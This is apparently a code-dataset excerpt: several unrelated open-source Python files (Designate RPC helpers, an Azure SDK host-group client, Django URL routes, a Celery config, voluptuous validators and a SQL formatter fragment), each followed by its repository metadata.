new_files.append(new_filename)
#print blist
fileh = open("../../config/list.txt.php")
blist = {}
for f in fileh:
f = f.rstrip()
f = f.split("|")
f[1] = f[1].rstrip()
blist[f[1]] = f[0]
globber = glob.glob("../captcha/speech/de/*.ogg")
rename(globber)
globber = glob.glob("../captcha/speech/de/*.mp3")
rename(globber)
globber = glob.glob("../captcha/speech/en/*.ogg")
rename(globber)
globber = glob.glob("../captcha/speech/en/*.mp3")
rename(globber)
|
gpl-2.0
| 4,740,280,325,139,808,000
| 20.236364
| 69
| 0.605308
| false
| 2.648526
| false
| false
| false
|
openstack/designate
|
designate/rpc.py
|
1
|
8026
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import threading
from oslo_config import cfg
import oslo_messaging as messaging
from oslo_messaging.rpc import dispatcher as rpc_dispatcher
from oslo_serialization import jsonutils
from designate import objects
import designate.context
import designate.exceptions
__all__ = [
'init',
'cleanup',
'set_defaults',
'add_extra_exmods',
'clear_extra_exmods',
'get_allowed_exmods',
'RequestContextSerializer',
'get_client',
'get_server',
'get_notifier',
]
CONF = cfg.CONF
EXPECTED_EXCEPTION = threading.local()
NOTIFICATION_TRANSPORT = None
NOTIFIER = None
TRANSPORT = None
# NOTE: Additional entries to designate.exceptions goes here.
ALLOWED_EXMODS = [
designate.exceptions.__name__,
'designate.backend.impl_dynect'
]
EXTRA_EXMODS = []
def init(conf):
global TRANSPORT, NOTIFIER, NOTIFICATION_TRANSPORT
exmods = get_allowed_exmods()
TRANSPORT = create_transport(get_transport_url())
NOTIFICATION_TRANSPORT = messaging.get_notification_transport(
conf, allowed_remote_exmods=exmods)
serializer = RequestContextSerializer(JsonPayloadSerializer())
NOTIFIER = messaging.Notifier(NOTIFICATION_TRANSPORT,
serializer=serializer)
def initialized():
return None not in [TRANSPORT, NOTIFIER, NOTIFICATION_TRANSPORT]
def cleanup():
global TRANSPORT, NOTIFIER, NOTIFICATION_TRANSPORT
if TRANSPORT is None:
raise AssertionError("'TRANSPORT' must not be None")
if NOTIFICATION_TRANSPORT is None:
raise AssertionError("'NOTIFICATION_TRANSPORT' must not be None")
if NOTIFIER is None:
raise AssertionError("'NOTIFIER' must not be None")
TRANSPORT.cleanup()
NOTIFICATION_TRANSPORT.cleanup()
TRANSPORT = NOTIFICATION_TRANSPORT = NOTIFIER = None
def set_defaults(control_exchange):
messaging.set_transport_defaults(control_exchange)
def add_extra_exmods(*args):
EXTRA_EXMODS.extend(args)
def clear_extra_exmods():
del EXTRA_EXMODS[:]
def get_allowed_exmods():
return ALLOWED_EXMODS + EXTRA_EXMODS + CONF.allowed_remote_exmods
class JsonPayloadSerializer(messaging.NoOpSerializer):
@staticmethod
def serialize_entity(context, entity):
return jsonutils.to_primitive(entity, convert_instances=True)
class DesignateObjectSerializer(messaging.NoOpSerializer):
def _process_iterable(self, context, action_fn, values):
"""Process an iterable, taking an action on each value.
:param:context: Request context
:param:action_fn: Action to take on each item in values
:param:values: Iterable container of things to take action on
:returns: A new container of the same type (except set) with
items from values having had action applied.
"""
iterable = values.__class__
if iterable == set:
# NOTE: A set can't have an unhashable value inside, such as
# a dict. Convert sets to tuples, which is fine, since we can't
# send them over RPC anyway.
iterable = tuple
return iterable([action_fn(context, value) for value in values])
def serialize_entity(self, context, entity):
if isinstance(entity, (tuple, list, set)):
entity = self._process_iterable(context, self.serialize_entity,
entity)
elif hasattr(entity, 'to_primitive') and callable(entity.to_primitive):
entity = entity.to_primitive()
return jsonutils.to_primitive(entity, convert_instances=True)
def deserialize_entity(self, context, entity):
if isinstance(entity, dict) and 'designate_object.name' in entity:
entity = objects.DesignateObject.from_primitive(entity)
elif isinstance(entity, (tuple, list, set)):
entity = self._process_iterable(context, self.deserialize_entity,
entity)
return entity
class RequestContextSerializer(messaging.Serializer):
def __init__(self, base):
self._base = base
def serialize_entity(self, context, entity):
if not self._base:
return entity
return self._base.serialize_entity(context, entity)
def deserialize_entity(self, context, entity):
if not self._base:
return entity
return self._base.deserialize_entity(context, entity)
def serialize_context(self, context):
return context.to_dict()
def deserialize_context(self, context):
return designate.context.DesignateContext.from_dict(context)
def get_transport_url(url_str=None):
return messaging.TransportURL.parse(CONF, url_str)
def get_client(target, version_cap=None, serializer=None):
if TRANSPORT is None:
raise AssertionError("'TRANSPORT' must not be None")
if serializer is None:
serializer = DesignateObjectSerializer()
serializer = RequestContextSerializer(serializer)
return messaging.RPCClient(
TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer
)
def get_server(target, endpoints, serializer=None):
if TRANSPORT is None:
raise AssertionError("'TRANSPORT' must not be None")
if serializer is None:
serializer = DesignateObjectSerializer()
serializer = RequestContextSerializer(serializer)
access_policy = rpc_dispatcher.DefaultRPCAccessPolicy
return messaging.get_rpc_server(
TRANSPORT,
target,
endpoints,
executor='eventlet',
serializer=serializer,
access_policy=access_policy
)
def get_notification_listener(targets, endpoints, serializer=None, pool=None):
if NOTIFICATION_TRANSPORT is None:
raise AssertionError("'NOTIFICATION_TRANSPORT' must not be None")
if serializer is None:
serializer = JsonPayloadSerializer()
return messaging.get_notification_listener(
NOTIFICATION_TRANSPORT,
targets,
endpoints,
executor='eventlet',
pool=pool,
serializer=serializer
)
def get_notifier(service=None, host=None, publisher_id=None):
if NOTIFIER is None:
raise AssertionError("'NOTIFIER' must not be None")
if not publisher_id:
publisher_id = "%s.%s" % (service, host or CONF.host)
return NOTIFIER.prepare(publisher_id=publisher_id)
def create_transport(url):
exmods = get_allowed_exmods()
return messaging.get_rpc_transport(CONF,
url=url,
allowed_remote_exmods=exmods)
def expected_exceptions():
def outer(f):
@functools.wraps(f)
def exception_wrapper(self, *args, **kwargs):
if not hasattr(EXPECTED_EXCEPTION, 'depth'):
EXPECTED_EXCEPTION.depth = 0
EXPECTED_EXCEPTION.depth += 1
# We only want to wrap the first function wrapped.
if EXPECTED_EXCEPTION.depth > 1:
return f(self, *args, **kwargs)
try:
return f(self, *args, **kwargs)
except designate.exceptions.DesignateException as e:
if e.expected:
raise rpc_dispatcher.ExpectedException()
raise
finally:
EXPECTED_EXCEPTION.depth = 0
return exception_wrapper
return outer
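# Hypothetical usage sketch: decorating an RPC-facing service method so that
# DesignateExceptions marked as expected are re-raised as
# rpc_dispatcher.ExpectedException for oslo.messaging (method name assumed):
#
#   @expected_exceptions()
#   def get_zone(self, context, zone_id):
#       ...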
|
apache-2.0
| -4,182,365,424,016,584,000
| 31.626016
| 79
| 0.661974
| false
| 4.246561
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2020_06_01/aio/operations/_dedicated_host_groups_operations.py
|
1
|
21434
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DedicatedHostGroupsOperations:
"""DedicatedHostGroupsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def create_or_update(
self,
resource_group_name: str,
host_group_name: str,
parameters: "_models.DedicatedHostGroup",
**kwargs: Any
) -> "_models.DedicatedHostGroup":
"""Create or update a dedicated host group. For details of Dedicated Host and Dedicated Host
Groups please see [Dedicated Host Documentation]
(https://go.microsoft.com/fwlink/?linkid=2082596).
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:param parameters: Parameters supplied to the Create Dedicated Host Group.
:type parameters: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DedicatedHostGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'DedicatedHostGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
async def update(
self,
resource_group_name: str,
host_group_name: str,
parameters: "_models.DedicatedHostGroupUpdate",
**kwargs: Any
) -> "_models.DedicatedHostGroup":
"""Update an dedicated host group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:param parameters: Parameters supplied to the Update Dedicated Host Group operation.
:type parameters: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroupUpdate
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DedicatedHostGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'DedicatedHostGroupUpdate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
host_group_name: str,
**kwargs: Any
) -> None:
"""Delete a dedicated host group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
async def get(
self,
resource_group_name: str,
host_group_name: str,
expand: Optional[str] = "instanceView",
**kwargs: Any
) -> "_models.DedicatedHostGroup":
"""Retrieves information about a dedicated host group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:param expand: The expand expression to apply on the operation. The response shows the list of
instance view of the dedicated hosts under the dedicated host group.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DedicatedHostGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DedicatedHostGroupListResult"]:
"""Lists all of the dedicated host groups in the specified resource group. Use the nextLink
property in the response to get the next page of dedicated host groups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DedicatedHostGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DedicatedHostGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups'} # type: ignore
def list_by_subscription(
self,
**kwargs: Any
) -> AsyncIterable["_models.DedicatedHostGroupListResult"]:
"""Lists all of the dedicated host groups in the subscription. Use the nextLink property in the
response to get the next page of dedicated host groups.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DedicatedHostGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DedicatedHostGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/hostGroups'} # type: ignore
|
mit
| -3,765,282,343,104,155,000
| 48.273563
| 180
| 0.646776
| false
| 4.315281
| true
| false
| false
|
dazhaoniel/1kg-more
|
js1kg/urls.py
|
1
|
3537
|
from django.conf.urls import url, include
from django.views.generic import TemplateView
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse_lazy
from rest_framework import routers
from js1kg.corporate import views as corporate_views
from js1kg.message import views as message_views
from js1kg.project import views as project_views
from js1kg.organization import views as organization_views
from js1kg.user import views as user_views
from js1kg.trip import views as trip_views
from js1kg.api import api
from . import views
# For Development Only
from django.conf import settings
from django.conf.urls.static import static
# REST API
router = routers.DefaultRouter()
router.register(r'^organizations', api.NonProfitOrganizationsViewSet)
router.register(r'^projects', api.ProjectsViewSet)
router.register(r'^users', api.UsersViewSet)
router.register(r'^threads', api.MessageThreadsViewSet)
router.register(r'^messages', api.MessagesViewSet)
router.register(r'^admins', api.OrgAdminsViewSet)
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'user/login.html'}, name='js1kg_login'),
url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': reverse_lazy('index')}, name='js1kg_logout'),
url(r'^register/$', user_views.register, name='user_register'),
url(r'^api/', include(router.urls)),
# Password Reset
# Organizations
# url(r'^organization/$', organization_views.organization_main, name='organization'),
url(r'^organization/$', TemplateView.as_view(template_name="organization/organization_main.html"), name='organization'),
url(r'^organization/create/$', login_required(organization_views.organization_create), name='organization_create'),
url(r'^organization/(?P<pk>[-\w]+)/edit/$', organization_views.OrganizationUpdate.as_view(), name='organization_update'),
url(r'^organization/(?P<slug>[-\w]+)/$', organization_views.organization_detail),
# url(r'^project/(?P<queryview>[\w-]+)/$', organization_views.organization_projects),
# Projects
# url(r'^project/$', project_views.project_main, name='project'),
url(r'^project/$', TemplateView.as_view(template_name="project/project_main.html"), name='project'),
url(r'^project/create/$', login_required(project_views.ProjectCreate.as_view()), name='project_create'),
url(r'^project/(?P<pk>[-\w]+)/edit/$', login_required(project_views.ProjectUpdate.as_view()), name='project_update'),
url(r'^project/(?P<pk>[-\w]+)/$', project_views.project_detail),
# User
url(r'^user/$', user_views.user_main, name='my_profile'),
url(r'^user/settings/$', user_views.user_settings, name='user_settings'),
url(r'^user/([a-zA-Z0-9-]{1,32})/$', user_views.other_profile, name='user_profile'),
# Messages
url(r'^messages/$', message_views.messages, name='my_inbox'),
url(r'^messages/(?P<pk>[-\w]+)/$', message_views.message_thread),
# Trips
url(r'^trip/$', trip_views.trip_main, name='my_trip'),
url(r'^trip/(?P<pk>[-\w]+)/$', trip_views.trip_detail),
# Corporate
url(r'^about/$', TemplateView.as_view(template_name="corporate/about.html"), name='about'),
# url(r'^contact-us/$', corporate_views.contact, name='contact_us'),
url(r'^style/$', TemplateView.as_view(template_name="corporate/style.html"), name='style_guide'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # For Development Only
|
apache-2.0
| 2,167,665,762,157,306,400
| 46.797297
| 125
| 0.704552
| false
| 3.491609
| false
| false
| false
|
jtaghiyar/single_cell_lims
|
elastidjango/celery.py
|
1
|
1033
|
"""
Created on Oct 27, 2016
@author: Jafar Taghiyar (jtaghiyar@bccrc.ca)
"""
from __future__ import absolute_import
import os
#============================
# Celery imports
#----------------------------
from celery import Celery
#============================
# Django imports
#----------------------------
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elastidjango.settings')
from django.conf import settings # noqa
#============================
# main
#----------------------------
app = Celery('elastidjango')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
# A common practice for reusable apps is to define all tasks in a separate
# tasks.py module, and this is how Celery autodiscovers these modules
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
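# A minimal task defined in an installed app's tasks.py module would then be
# picked up automatically, e.g. (illustrative sketch, not part of this file):
#
#   from celery import shared_task
#
#   @shared_task
#   def ping():
#       return 'pong'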
# @app.task(bind=True)
# def debug_task(self):
# print('Request: {0!r}'.format(self.request))
|
mit
| 4,008,024,806,926,323,000
| 25.512821
| 74
| 0.621491
| false
| 3.742754
| false
| false
| false
|
alecthomas/voluptuous
|
voluptuous/util.py
|
3
|
3150
|
import sys
from voluptuous.error import LiteralInvalid, TypeInvalid, Invalid
from voluptuous.schema_builder import Schema, default_factory, raises
from voluptuous import validators
__author__ = 'tusharmakkar08'
def _fix_str(v):
if sys.version_info[0] == 2 and isinstance(v, unicode):
s = v
else:
s = str(v)
return s
def Lower(v):
"""Transform a string to lower case.
>>> s = Schema(Lower)
>>> s('HI')
'hi'
"""
return _fix_str(v).lower()
def Upper(v):
"""Transform a string to upper case.
>>> s = Schema(Upper)
>>> s('hi')
'HI'
"""
return _fix_str(v).upper()
def Capitalize(v):
"""Capitalise a string.
>>> s = Schema(Capitalize)
>>> s('hello world')
'Hello world'
"""
return _fix_str(v).capitalize()
def Title(v):
"""Title case a string.
>>> s = Schema(Title)
>>> s('hello world')
'Hello World'
"""
return _fix_str(v).title()
def Strip(v):
"""Strip whitespace from a string.
>>> s = Schema(Strip)
>>> s(' hello world ')
'hello world'
"""
return _fix_str(v).strip()
class DefaultTo(object):
"""Sets a value to default_value if none provided.
>>> s = Schema(DefaultTo(42))
>>> s(None)
42
>>> s = Schema(DefaultTo(list))
>>> s(None)
[]
"""
def __init__(self, default_value, msg=None):
self.default_value = default_factory(default_value)
self.msg = msg
def __call__(self, v):
if v is None:
v = self.default_value()
return v
def __repr__(self):
return 'DefaultTo(%s)' % (self.default_value(),)
class SetTo(object):
"""Set a value, ignoring any previous value.
>>> s = Schema(validators.Any(int, SetTo(42)))
>>> s(2)
2
>>> s("foo")
42
"""
def __init__(self, value):
self.value = default_factory(value)
def __call__(self, v):
return self.value()
def __repr__(self):
return 'SetTo(%s)' % (self.value(),)
class Set(object):
"""Convert a list into a set.
>>> s = Schema(Set())
>>> s([]) == set([])
True
>>> s([1, 2]) == set([1, 2])
True
>>> with raises(Invalid, regex="^cannot be presented as set: "):
... s([set([1, 2]), set([3, 4])])
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except Exception as e:
raise TypeInvalid(
self.msg or 'cannot be presented as set: {0}'.format(e))
return set_v
def __repr__(self):
return 'Set()'
class Literal(object):
def __init__(self, lit):
self.lit = lit
def __call__(self, value, msg=None):
if self.lit != value:
raise LiteralInvalid(
msg or '%s not match for %s' % (value, self.lit)
)
else:
return self.lit
def __str__(self):
return str(self.lit)
def __repr__(self):
return repr(self.lit)
def u(x):
if sys.version_info < (3,):
return unicode(x)
else:
return x
|
bsd-3-clause
| 5,798,480,879,912,180,000
| 18.444444
| 72
| 0.51619
| false
| 3.469163
| false
| false
| false
|
google/sample-sql-translator
|
sql_parser/func.py
|
1
|
3624
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dataclasses import dataclass
from typing import Optional
from typing import List
from rfmt.blocks import LineBlock as LB
from rfmt.blocks import IndentBlock as IB
from rfmt.blocks import TextBlock as TB
from rfmt.blocks import StackBlock as SB
from rfmt.blocks import WrapBlock as WB
from .utils import comments_sqlf
from .const import SQLString
from .ident import SQLIdentifier
from .node import SQLNode
from .node import SQLNodeList
from .expr import SQLExpr
from .types import SQLType
from .types import SQLNamedType
@dataclass(frozen=True)
class SQLFunction(SQLNode):
name: SQLIdentifier
params: SQLNodeList[SQLNode]
retval: Optional[SQLNode]
impl: SQLNode
comments: List[str]
def sqlf(self, compact):
# Start the stack with comments
stack = comments_sqlf(self.comments)
# Get params as a list of sqlf
paramf = []
for param in self.params[:-1]:
paramf.append(LB([param.sqlf(compact), TB(',')]))
if self.params:
paramf.append(self.params[-1].sqlf(compact))
stack.append(LB([
TB('CREATE TEMPORARY FUNCTION '),
self.name.sqlf(True),
TB('('),
WB(paramf, sep=' '),
TB(')')
]))
if self.retval:
